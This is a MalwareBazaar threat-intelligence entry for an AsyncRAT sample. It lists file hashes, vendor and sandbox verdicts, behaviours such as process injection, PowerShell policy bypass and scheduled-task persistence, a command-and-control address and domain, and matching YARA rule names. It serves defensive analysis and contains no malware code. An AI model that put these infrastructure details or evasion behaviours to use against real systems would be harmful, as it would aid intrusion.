MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 630db15b4a855ca42e13666e2046c639a4c2847e0d1fc52a4242ebc369ab26e7. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


AsyncRAT


Vendor detections: 10


Intelligence 10 IOCs YARA 25 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 630db15b4a855ca42e13666e2046c639a4c2847e0d1fc52a4242ebc369ab26e7
SHA3-384 hash: 02b090b633e8271dba79a43b48c66a0b554bf04e15142331d30132919813eb0b99f37235f27fe0ee494df81deca37bcd
SHA1 hash: 9a5f2a032d56b7347781ff3baa7343bf3cc3f203
MD5 hash: f24ecd62c00dd9db120fd3d54b069960
humanhash: princess-paris-idaho-comet
File name:630DB15B4A855CA42E13666E2046C639A4C2847E0D1FC.exe
Download: download sample
Signature AsyncRAT
Create hunting rule
File size:45'401'235 bytes
First seen:2024-01-21 15:35:31 UTC
Last seen:Never
File type:Executable exe
MIME type:application/x-dosexec
imphash 4d0fb8dc9ee470058274f448bebbb85f (4 x NodeLoader, 3 x Rhadamanthys, 3 x DogeStealer)
ssdeep 393216:R1Du8BtuBw2FEL3Z3aLUoQvo6LP/SgbSpYvKEh1EdKwlGQKPJuGsiTfREsrgCYfL:RMguj8Q4Vfv7qFTrYwPP3
Threatray 92 similar samples on MalwareBazaar
TLSH T149A79C0773E60195E5B7D2388AA74507D773B8634331CADF329D06152FABAE09A7E720
TrID 63.5% (.EXE) Win64 Executable (generic) (10523/12/4)
12.2% (.EXE) OS/2 Executable (generic) (2029/13)
12.0% (.EXE) Generic Win/DOS Executable (2002/3)
12.0% (.EXE) DOS Executable Generic (2000/1)
File icon (PE):PE icon
dhash icon f89efcf8f971f2e0 (9 x NodeLoader, 6 x Amadey, 6 x Plugx)
Reporter abuse_ch
Tags:AsyncRAT exe RAT


Avatar
abuse_ch
AsyncRAT C2:
94.130.130.51:55

Intelligence

File Origin
# of uploads :
1
# of downloads :
380
Origin country :
NL NL
Vendor Threat Intelligence
Result
Verdict:
Malware
Maliciousness:

Behaviour
Running batch commands
Creating a process with a hidden window
Creating a file
Сreating synchronization primitives
Creating a process from a recently created file
Creating a window
Sending a custom TCP request
Searching for the window
Launching a process
Transferring files using the Background Intelligent Transfer Service (BITS)
DNS request
Enabling the 'hidden' option for recently created files
Moving a recently created file
Using the Windows Management Instrumentation requests
Deleting a system file
Deleting a recently created file
Enabling autorun by creating a file
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
anti-debug crypto evasive expand fingerprint lolbin overlay packed
Link:
https://www.filescan.io/uploads/65ad39e668f6c896b6d3fe83/reports/ae343eee-c877-42e3-b10b-36ca27138a8d/overview
Verdict:
Malicious
Labled as:
Win/malicious_confidence_70%
Link:
https://www.hybrid-analysis.com/sample/630db15b4a855ca42e13666e2046c639a4c2847e0d1fc52a4242ebc369ab26e7
Result
Verdict:
MALICIOUS
Result
Threat name:
AsyncRAT
Create hunting rule
Detection:
malicious
Classification:
troj.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1378299
Signature
Benign windows process drops PE files
Bypasses PowerShell execution policy
Injects a PE file into a foreign processes
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Powershell uses Background Intelligent Transfer Service (BITS)
Snort IDS alert for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected AsyncRAT
Yara detected Generic Downloader
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1378299 Sample: 630DB15B4A855CA42E13666E204... Startdate: 21/01/2024 Architecture: WINDOWS Score: 100 118 utorrent.theworkpc.com 2->118 120 nodejs.org 2->120 128 Snort IDS alert for network traffic 2->128 130 Malicious sample detected (through community Yara rule) 2->130 132 Multi AV Scanner detection for dropped file 2->132 134 3 other signatures 2->134 13 630DB15B4A855CA42E13666E2046C639A4C2847E0D1FC.exe 23 2->13         started        16 wscript.exe 2->16         started        18 wscript.exe 2->18         started        20 3 other processes 2->20 signatures3 process4 dnsIp5 108 C:\Users\Public\Framework\node.exe, PE32+ 13->108 dropped 110 C:\Users\Public\Framework\PowerRun.exe, PE32 13->110 dropped 112 C:\Users\Public\Framework\xx.dll, ASCII 13->112 dropped 116 11 other malicious files 13->116 dropped 24 cmd.exe 2 13->24         started        26 cmd.exe 3 2 13->26         started        28 cmd.exe 1 13->28         started        39 2 other processes 13->39 31 node.exe 16->31         started        33 node.exe 18->33         started        124 nodejs.org 104.20.23.46, 443, 49732, 49733 CLOUDFLARENETUS United States 20->124 126 127.0.0.1 unknown unknown 20->126 114 C:\Users\Public\Framework\BIT8068.tmp, PE32+ 20->114 dropped 136 Benign windows process drops PE files 20->136 35 node.exe 20->35         started        37 node.exe 20->37         started        file6 signatures7 process8 signatures9 41 wscript.exe 3 1 24->41         started        44 conhost.exe 24->44         started        50 2 other processes 26->50 154 Suspicious powershell command line found 28->154 156 Wscript starts Powershell (via cmd or directly) 28->156 158 Bypasses PowerShell execution policy 28->158 46 conhost.exe 28->46         started        52 2 other processes 31->52 54 2 other processes 33->54 56 2 other processes 35->56 58 2 other processes 37->58 48 conhost.exe 39->48         started        process10 signatures11 140 Wscript starts Powershell (via cmd or directly) 41->140 60 cmd.exe 1 41->60         started        142 Windows Scripting host queries suspicious COM object (likely to drop second stage) 50->142 144 Suspicious execution chain found 50->144 63 node.exe 1 50->63         started        65 powershell.exe 52->65         started        67 powershell.exe 54->67         started        69 powershell.exe 56->69         started        146 Suspicious powershell command line found 58->146 71 powershell.exe 58->71         started        process12 signatures13 160 Suspicious powershell command line found 60->160 162 Wscript starts Powershell (via cmd or directly) 60->162 73 powershell.exe 23 60->73         started        76 conhost.exe 60->76         started        78 cmd.exe 63->78         started        80 conhost.exe 63->80         started        164 Writes to foreign memory regions 65->164 166 Injects a PE file into a foreign processes 65->166 82 aspnet_compiler.exe 65->82         started        89 2 other processes 65->89 91 2 other processes 67->91 85 aspnet_compiler.exe 69->85         started        87 aspnet_compiler.exe 71->87         started        process14 dnsIp15 148 Uses schtasks.exe or at.exe to add and modify task schedules 73->148 150 Powershell uses Background Intelligent Transfer Service (BITS) 73->150 93 node.exe 73->93         started        95 WmiPrvSE.exe 73->95         started        97 schtasks.exe 73->97         started        152 Wscript starts Powershell (via cmd or directly) 78->152 99 powershell.exe 78->99         started        122 utorrent.theworkpc.com 94.130.130.51, 49740, 55 HETZNER-ASDE Germany 82->122 signatures16 process17 process18 101 cmd.exe 93->101         started        104 conhost.exe 93->104         started        signatures19 138 Wscript starts Powershell (via cmd or directly) 101->138 106 powershell.exe 101->106         started        process20
Score:
28%
Verdict:
Benign
File Type:
PE
Link:
https://malprob.io/report/630db15b4a855ca42e13666e2046c639a4c2847e0d1fc52a4242ebc369ab26e7
Gathering data
Threat name:
Win32.Trojan.Generic
Create hunting rule
Status:
Malicious
First seen:
2023-12-13 04:04:26 UTC
File Type:
PE+ (Exe)
Extracted files:
12
AV detection:
15 of 24 (62.50%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=mmg3cw2kqvokilqtmzxcarwghgsmfbd6bup4kkscilv4g2nle3tq._file
Verdict:
unknown
Similar samples:
1f75823631e70c74d3c906e6e51bd24d6e109729a8dc703aa712e8174e208330
AsyncRAT
33ab895e270da5c3783cadbee52e1728500af03fb414520c29f1bebb9fe3c504
AsyncRAT
a89e066997d137ccf02fbc27e4f8a2335cade89ff4be8ccd4bacf9278e24f576
AsyncRAT
bf98ed9f11287725a0aee62192eb6a515b0107d34d2bdd1bb64a6cfc59d2dc99
AsyncRAT
dab1bc725537fd108f5bfab274982773c68e9ef8d14d3412495cbcfdf1f04f70
AsyncRAT
f4d0995a2fe461ce29b3fb7b4a8479b92a47396d245fe627ba56881877dcbe25
AsyncRAT
+ 82 additional samples on MalwareBazaar
Result
Malware family:
zgrat
Create hunting rule
Score:
  10/10
Tags:
family:asyncrat family:zgrat botnet:tornew evasion rat trojan
Link:
https://tria.ge/reports/240121-s1xglsdfcn/
Behaviour
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Enumerates physical storage devices
Suspicious use of SetThreadContext
Checks computer location settings
Downloads MZ/PE file
Async RAT payload
AsyncRat
Detect ZGRat V1
UAC bypass
ZGRat
Malware Config
C2 Extraction:
utorrent.theworkpc.com:55
Dropper Extraction:
https://nodejs.org/download/release/v6.17.1/win-x64/node.exe
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/630db15b4a855ca42e13666e2046c639a4c2847e0d1fc52a4242ebc369ab26e7

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:adonunix2
Create hunting rule
Author:Tim Brown @timb_machine
Description:AD on UNIX
Rule name:APT_Bitter_ZxxZ_Downloader
Create hunting rule
Author:SECUINFRA Falcon Team (@SI_FalconTeam)
Description:Detects Bitter (T-APT-17) ZxxZ Downloader
Reference:https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh
Rule name:attack_India
Create hunting rule
Rule name:BitcoinAddress
Create hunting rule
Author:Didier Stevens (@DidierStevens)
Description:Contains a valid Bitcoin address
Rule name:BLOWFISH_Constants
Create hunting rule
Author:phoul (@phoul)
Description:Look for Blowfish constants
Rule name:Check_OutputDebugStringA_iat
Create hunting rule
Rule name:DebuggerCheck__API
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DebuggerCheck__QueryInfo
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DebuggerException__SetConsoleCtrl
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:Glasses
Create hunting rule
Author:Seth Hardy
Description:Glasses family
Rule name:GlassesCode
Create hunting rule
Author:Seth Hardy
Description:Glasses code features
Rule name:ldpreload
Create hunting rule
Author:xorseed
Reference:https://stuff.rop.io/
Rule name:MD5_Constants
Create hunting rule
Author:phoul (@phoul)
Description:Look for MD5 constants
Rule name:Mimikatz_Generic
Create hunting rule
Author:Still
Description:attempts to match all variants of Mimikatz
Rule name:QbotStuff
Create hunting rule
Author:anonymous
Rule name:reverse_http
Create hunting rule
Author:CD_R0M_
Description:Identify strings with http reversed (ptth)
Rule name:RIPEMD160_Constants
Create hunting rule
Author:phoul (@phoul)
Description:Look for RIPEMD-160 constants
Rule name:SEH__vectored
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:SHA1_Constants
Create hunting rule
Author:phoul (@phoul)
Description:Look for SHA1 constants
Rule name:SHA512_Constants
Create hunting rule
Author:phoul (@phoul)
Description:Look for SHA384/SHA512 constants
Rule name:upxHook
Create hunting rule
Author:@r3dbU7z
Description:Detect artifacts from 'upxHook' - modification of UPX packer
Reference:https://bazaar.abuse.ch/sample/6352be8aa5d8063673aa428c3807228c40505004320232a23d99ebd9ef48478a/
Rule name:WHIRLPOOL_Constants
Create hunting rule
Author:phoul (@phoul)
Description:Look for WhirlPool constants
Rule name:without_attachments
Create hunting rule
Author:Antonio Sanchez <asanchez@hispasec.com>
Description:Rule to detect the no presence of any attachment
Reference:http://laboratorio.blogs.hispasec.com/
Rule name:with_urls
Create hunting rule
Author:Antonio Sanchez <asanchez@hispasec.com>
Description:Rule to detect the presence of an or several urls
Reference:http://laboratorio.blogs.hispasec.com/
Rule name:yara_template
Create hunting rule

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Comments